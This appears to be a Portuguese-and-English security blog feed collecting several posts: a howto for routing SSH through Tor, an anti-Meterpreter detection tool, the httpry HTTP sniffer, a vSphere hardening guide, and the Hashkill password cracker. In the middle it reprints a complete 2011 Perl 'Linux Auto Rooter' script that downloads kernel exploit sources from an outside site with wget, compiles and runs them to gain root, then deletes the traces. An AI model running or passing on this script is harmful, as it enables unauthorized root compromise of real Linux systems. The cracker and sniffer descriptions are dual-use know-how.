Anonymous SSH Sessions With TOR

Fonte:http://www.howtoforge.com/anonymous-ssh-sessions-with-tor

OpenSSH is a great means to protect your connection from being sniffed by others. However, this isn’t always enough. Simply proving that you connected to a server is enough to get incriminated. Unfortunately, SSH doesn’t provide a native way to obfuscate to whom it connects. Instead, a proxy server can be set up. And this is where TOR comes to play. This howto covers installing TOR on a Debian based system and setting up SSH to use TOR.

Installing TOR

First you should to add the TOR repository to your system. It’s only necessary if there’s no package in the default repositories.

Add the following line to your /etc/apt/sources.list file. You have to replace lenny with your distribution.

deb http://mirror.noreply.org/pub/tor lenny main

To use this repository without problems, you have to add the PGP key to your system.

apt-key adv –recv-keys –keyserver subkeys.pgp.net 0x94C09C7F

Update your repositories and install TOR.

apt-get update && apt-get install -y tor

If you want to use TOR with OpenSSH, you have to install another program called connect-proxy.

apt-get install -y connect-proxy

Setup OpenSSH to use TOR for all connections

However, this is not recommended, but here is how it works.

Add the following block to the top of your ~/.ssh/config file.

Host *
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

The command line syntax won’t change at all.

Set up OpenSSH to use TOR for a specific connection

I recommend using TOR only for a specific connection. All other connections won’t be affected.

Add this block to your ~/.ssh/config. You have to replace mydomain with the host domain name or IP address and myaccount with your user name.

Host mydomain
HostName mydomain.com
User myaccount
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

Set up OpenSSH to use TOR for a bunch of connections

Instead of setting up TOR for every single connections, you can do this for a bunch of connections at once. Following example shows how it works.

Host anon_*
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p
Host anon_mydomain
HostName mydomain.com
User myaccount
Host anon_mydomain2
HostName mydomain2.com
User myaccount
Port 980

This way you know exactly if you’re using TOR or not.

Conclusion

It is very simple to anonymize your SSH sessions if you know what you’re doing. I’ve written this tutorial for legal purposes only. Using this is your own risk.

Anúncios

Antimeter Tool – Anti Meterpreter (Metasploit) for Windows – Uma ferramenta defensiva contra o Meterpreter do Metasploit

Uma ferramenta defensiva contra o Meterpreter do Metasploit

Link: http://www.mertsarica.com/codes/antimeter2.zip

USO

Code:

antimeter.exe [argumentos]

Argumentos Opcionais:
-t [intervalo de tempo] Varre a memória em cada intervalo de tempo especificado (Padrão intervalo de tempo é um (1) minuto)
-a Automaticamente mata o processo Meterpreter (desativado por padrão)
-d Apenas detecta o processo Meterpreter (desativado por padrão)
-e Adiciona processo para a lista de exclusão (por exemplo, uma “blacklist”)

EXEMPLOS
Varre a memória em cada 5 minutos, mata o processo Meterpreter automaticamente e é habilitado o modo verbose:

Code:

antimeter.exe -t 5 -a -v

Varre a memória em cada minuto e só detecta o processo Meterpreter:

Code:

antimeter.exe -n

Varre a memória em cada minuto, sendo os processos “explorer e winlogon” são excluídos da análise:

Code:

antimeter.exe -e explorer.exe,winlogon.exe

Ai a pergunta? Porque usar uma ferramenta dessas, sendo que eu uso Linux ou Mac, por exemplo?

A resposta é “PORQUE SIM!!!”, deixando as zoeira de lado, quando você tem ambientes heterogênios e grandes, há uma grande tendência para ter servers e desktops Windows.

Então se for o caso está ai uma solução, para um SO tão fraco quanto Windows (no caso ele mesmo!)

@firebitsbr

OBS: Já existe script no metasploit, que é anti-antimeterpreter, mas…deixa pra lá;)

httpry – is a specialized packet sniffer designed for displaying and logging HTTP traffic

httpry

Current version: 0.1.5

dumpster / jason / httpry


core program

httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.

What can you do with it? Here’s a few ideas:

  • See what users on your network are requesting online
  • Check for proper server configuration (or improper, as the case may be)
  • Research patterns in HTTP usage
  • Watch for dangerous downloaded files
  • Verify the enforcement of HTTP policy on your network
  • Extract HTTP statistics out of saved capture files
  • It’s just plain fun to watch in realtime

Here’s an example of the log file output using the default output format string:

# httpry version 0.1.5
# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET http://www.google.com / HTTP/1.1 – –
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET http://www.google.com / HTTP/1.1 – –
2009-01-12 15:02:32 192.168.0.16 209.85.171.103 > GET http://www.google.com / HTTP/1.1 – –
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET http://www.google.com / HTTP/1.1 – –
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < – – – HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET http://www.google.com /intl/en_ALL/images/logo.gif HTTP/1.1 – –
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < – – – HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET http://www.google.com /extern_js/f/CgJlbhICdXMrMAo4DSwrMA44AywrMBg4Ayw/AQ-hC7_2R8g.js HTTP/1.1 – –
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < – – – HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.173.101 > GET clients1.google.com /generate_204 HTTP/1.1 – –
2009-01-12 15:02:33 209.85.173.101 192.168.0.16 < – – – HTTP/1.1 204 No Content

parsing scripts

Of course, the fun of collecting data is finding ways to analyze it. The log files are designed to be easily parsed by command line utilities, but sometimes you need to dig a little deeper. Complementing the core httpry program is a set of parsing scripts for mining information out of generated log files. Most of these scripts are written as plugins for a core parsing script and include functionality for extracting search terms, searching for specified terms within client flows, and outputting the logs in XML among other things. It is relatively straightforward to write custom plugins for additional parsing tasks.

latest news

There are several major enhancements in the latest version of httpry. The two major added features are SIGHUP handling for gracefully reopening output files (thanks to Philipp for providing a patch with this functionality) and defaulting output files to line buffering (partly related to the same patch, but also requested by several other users). In addition, there is a new binary pcap dump file option, and both “source-port” and “dest-port” were added as available output fields.

Important Note! The command line switch for specifying a format string was changed from -s to -f to make it more mnemonic. If you have any scripts that use this switch, be sure to update them accordingly.

The Perl log parsing scripts were also updated significantly for this release. Across all plugins, the init() and end() calls are now executed with eval() to make them more resilient to errors. There is also a new list() function added to each plugin that allows it to specify required fields in the input file. If the fields aren’t present then the plugin will be disabled. The content analysis plugin was also substantially rewritten to use a sliding window to specify flows instead of time delimiting them.

Download httpry 0.1.5

If you are using FreeBSD, you can also get httpry as a FreeBSD port.


2011 Linux Auto Rooter Beta 1.0 Coded by CrosS

2011 Linux Auto Rooter Beta 1.0 Coded by CrosS

Este script em perl faz download de alguns exploits em C, compilando com GCC, na tentativa de verificar se há 
Escalada de Privilégios no Kernel do Linux (Kernels 2.6.18, 2.6.33, 2.6.34, 2.6.37-rc2, 2.6.37, 2.6.43.2, 3.0)

Na verdade só está automatizando o processo de testes de cada exploit feito em C, o que poderia ter sido a 
compilação e testes manualmente.




#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS           #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 root    => To root            #\n";
print "#    perl $0 del     => Delete Exploit     #\n";
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter =)        #\n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #\n";
print "#                                                          #\n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

este script foi desenvolvido pelo CrosS para explorar algumas vulnerabilidades 
de algumas versões de kernel do Linux para ter uma escalada 
de privilégios e se tornar ROOT.

@firebitsbr

VMware vSphere 4.1 security hardening guide

This document is the official release of the vSphere 4.1 Security Hardening Guide.  This version is based on feedback collected during the public draft comment period.  We will still be collecting feedback on this document — if there are any typos, errors, or changes, please add them to the comments below.

This set of documents provides guidance on how to securely deploy VMware® vSphere™ 4.1 (“vSphere”) in a production environment. The focus is on initial configuration of the virtualization infrastructure layer, which covers the following:

  • The virtualization hosts (both VMware ESX® 4 and VMware ESXi™ 4)
  • Configuration of the virtual machine container (NOT hardening of the guest operating system (OS) or any applications running within)
  • Configuration of the virtual networking infrastructure, including themanagement and storage networks as well as the virtual switch (but NOT security of the virtual machine’s network)
  • VMware vCenter™ Server, its database and client components
  • VMware Update Manager (included because the regular update and patching of the ESX/ESXi hosts and the virtual machine containers are essential to maintaining the security of the environment)

The following are specifically out of scope and are NOT covered:

  • Security of the software running inside the virtual machine, such as OS and applications, and the traffic traveling through the virtual machine networks
  • Security of any other add-on products, such as SRM
  • Detailed operational procedures related to maintaining security, such as event monitoring, auditing and privilege management. Guidance is provided on general areas in which to perform these important tasks, but details on exactly how to perform them are out of scope.

Download : http://communities.vmware.com/docs/DOC-15413

Hashkill A Multithreaded Open Source Password Cracker

Hashkill is a multi-threaded open source password cracker. It uses the OpenSSL library to crack different types of password hashes.It supports plugins that can be created to crack many other services. Its features are:

  • Supports 4 modes (bruteforce, dictionary, hybrid, markov)
  • multithreaded
  • 31 plugins for different hash types, including also zip passwords, ssh passphrases, etc
  • session autosave/resume
  • SSE2-accelerated

 

The following plugins are currently available:

  1. apr1 – Apache apr1 plugin
  2. cisco-pix – Cisco PIX password hashes plugin
  3. desunix – DES(Unix) plugin (.htpasswd)
  4. hashunix – MD5(Unix)/SHA256(Unix)/SHA256(Unix) plugin (shadow files)
  5. ipb2 – md5(md5(salt).md5(pass)) plugin (IPB > 2.x)
  6. ldap-sha – LDAP SHA plugin
  7. ldap-ssha – LDAP SSHA (salted SHA) plugin
  8. lm – LM plugin
  9. md4 – MD4 plugin
  10. md5-passsalt – md5(password,salt) plugin (joomla)
  11. md5-saltpass – md5(salt,password) plugin (osCommerce)
  12. md5 – MD5 plugin
  13. md5md5 – md5(md5(pass)) plugin
  14. mssql-2000 – Microsoft SQL Server 2000 plugin
  15. mssql-2005 – Microsoft SQL Server 2005 plugin
  16. mysql-old – MySQL < 4.1 plugin
  17. mysql5 – MySQL > 4.1 plugin
  18. ntlm – NTLM plugin
  19. oracle-old – Oracle 7 up to 10r2 plugin
  20. oracle11g – Oracle 11g plugin
  21. phpbb3 – phpBB3 hashes plugin
  22. privkey – SSH/SSL private key passphrase plugin
  23. ripemd160 – RIPEMD-160 plugin
  24. sha1 – SHA1 plugin
  25. sha1sha1 – sha1(sha1(pass)) plugin
  26. sha256 – SHA-256 plugin
  27. sha512 – SHA-512 plugin
  28. smf – SMF plugin
  29. vbulletin – md5(md5(pass).salt) plugin
  30. wordpress – WordPress hashes plugin
  31. zip – ZIP passwords plugin

 

Download hashkill v0.2.3b.
http://sourceforge.net/projects/hashkill/files/